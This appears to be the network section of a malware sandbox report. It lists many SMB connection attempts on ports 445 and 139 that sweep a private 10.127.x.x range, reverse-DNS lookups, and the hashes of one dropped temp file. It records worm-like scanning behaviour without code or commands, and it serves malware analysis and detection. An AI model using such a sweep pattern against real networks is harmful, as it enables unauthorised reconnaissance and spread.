US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.161:139 tcp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.67:139 tcp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.168:445 tcp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.75:139 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.174:139 tcp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
N/A 10.127.0.175:445 tcp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.180:139 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.181:139 tcp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.187:139 tcp
N/A 10.127.0.188:445 tcp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.193:139 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.194:139 tcp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.88:139 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.201:139 tcp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.202:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.92:139 tcp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.207:139 tcp
N/A 10.127.0.208:445 tcp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
N/A 10.127.0.208:139 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.213:139 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.214:139 tcp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:445 tcp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
N/A 10.127.0.221:139 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.228:445 tcp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.108:139 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.234:139 tcp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.241:139 tcp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.242:139 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.246:139 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.247:139 tcp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.253:139 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.254:139 tcp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.255:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.1.0:139 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.1:139 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.2:139 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.3:139 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.4:139 tcp
N/A 10.127.1.5:445 tcp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
N/A 10.127.1.5:139 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.1.6:139 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.128:139 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.7:139 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.8:139 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.9:139 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.10:139 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.11:139 tcp
N/A 10.127.1.12:445 tcp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
N/A 10.127.1.12:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.1.13:139 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.14:139 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.15:139 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.16:139 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.17:139 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.18:139 tcp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.19:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.20:139 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.21:139 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.22:139 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.23:139 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.24:139 tcp
N/A 10.127.1.25:445 tcp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
N/A 10.127.1.25:139 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.1.26:139 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.27:139 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.28:139 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.29:139 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.30:139 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.31:139 tcp
N/A 10.127.1.32:445 tcp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
N/A 10.127.1.32:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.1.33:139 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.34:139 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.35:139 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.36:139 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.37:139 tcp
N/A 10.127.1.38:445 tcp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
N/A 10.127.1.38:139 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.39:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.40:139 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.41:139 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.42:139 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.43:139 tcp
US 13.107.253.64:445 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.44:139 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.45:139 tcp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
N/A 10.127.1.46:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.1.46:139 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.1.47:139 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.48:139 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.49:139 tcp
N/A 10.127.1.50:445 tcp
NL 154.61.71.13:445 tcp
N/A 10.127.1.50:139 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.51:139 tcp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.52:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.1.53:139 tcp
GB 142.250.179.234:445 chromewebstore.googleapis.com tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.54:139 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.55:139 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.56:139 tcp
US 104.208.16.95:445 self.events.data.microsoft.com tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.57:139 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.58:139 tcp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
N/A 10.127.1.59:445 tcp
N/A 10.127.1.59:139 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.60:139 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.61:139 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.62:139 tcp
N/A 10.127.1.63:445 tcp
US 13.107.42.16:445 config.edge.skype.com tcp
N/A 10.127.1.63:139 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.64:139 tcp
N/A 10.127.1.65:445 tcp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
N/A 10.127.1.65:139 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.1.66:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.67:139 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.68:139 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.1.69:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.70:139 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.71:139 tcp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
N/A 10.127.1.72:445 tcp
N/A 10.127.1.72:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.1.73:139 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.74:139 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.75:139 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.1.76:139 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.77:139 tcp
N/A 10.127.1.78:445 tcp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
N/A 10.127.1.78:139 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.1.79:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.175:139 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.80:139 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.81:139 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.82:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.83:139 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.84:139 tcp
N/A 10.127.1.85:445 tcp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
N/A 10.127.1.85:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.1.86:139 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.87:139 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.88:139 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.1.89:139 tcp

Files

C:\Users\Admin\AppData\Local\Temp\E659.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
